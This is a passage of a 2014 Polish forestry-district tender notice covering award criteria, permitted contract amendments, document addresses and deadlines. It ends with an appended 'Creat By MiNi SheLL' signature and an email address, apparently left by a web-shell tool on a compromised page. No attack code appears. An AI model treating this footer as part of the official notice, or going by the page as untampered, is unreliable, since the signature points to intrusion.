<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień
         Publicznych  (Dz.U. z 2013 r. poz. 907, 984, 1047, 1473 oraz z 2014 r. poz. 423), 
         Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian zawartej umowy
         w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,
         jeżeli wystąpi co najmniej jedna z wymienionych niżej okoliczności oraz zostaną
         uwzględnione opisane poniżej warunki wprowadzenia tych zmian tj.:
         1) terminu wykonania zamówienia:
         a) jeżeli zajdzie konieczność wprowadzenia w dokumentacji projektowej,
             specyfikacjach technicznych wykonania i odbioru robót budowlanych albo
             w innych dokumentach, zmian wywołanych zmianami w przepisach prawa,
             norm i standardów albo zmianami w wiedzy technicznej;
         b) jeżeli zajdzie konieczność wprowadzenia zmian w sposobie wykonania robót
             budowlanych, spowodowanych zmianami w przepisach prawa, norm i standardów                                         
             lub zmianami w wiedzy technicznej lub zmianą funkcji użytkowej oraz
             w przypadku stwierdzenia niezinwentaryzowanych elementów infrastruktury;
         c) na skutek działania siły wyższej (np. klęski żywiołowej), mającego bezpośredni
             wpływ na terminowość wykonywania robót;
         d) w przypadku wystąpienia warunków atmosferycznych uniemożliwiających 
             wykonywanie robót zgodnie z sztuką budowlaną;
         e) jeżeli wystąpią okoliczności, których strony nie mogły przewidzieć, pomimo
             zachowania należytej staranności;
         f) jeżeli konieczność zmiany terminu zakończenia robót wystąpi w następstwie
             okoliczności leżących po stronie Zamawiającego, w szczególności w przypadku
             czasowego wstrzymania robót przez Zamawiającego;
        2) Zmiany zakresu zamówienia powierzonego do wykonania podwykonawcom;
        3) Zmiany osoby  pełniącej funkcję kierownika budowy;
        4) Zmiany formy zabezpieczenia należytego wykonania umowy;
        5) Zmiany danych związanych z obsługa administracyjno-organizacyjną umowy                                                   
            (np. zmiana nr rachunku bankowego)
        6) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów 
            między stronami;

           W przypadku wystąpienia którejkolwiek z wymienionych okoliczności, termin 
            realizacji zamówienia ulega odpowiedniemu wydłużeniu o czas niezbędny na
            należyte spełnienie świadczenia, nie dłużej jednak niż czas trwania tych
            okoliczności.
            Wszystkie zmiany dla swojej ważności wymagają formy pisemnej w postaci
            kolejno ponumerowanych aneksów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/rudziniec<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 44-160 Rudziniec ul. Leśna 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2014 godzina 13:00, miejsce: Nadleśnictwo Rudziniec ul Leśna 7 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com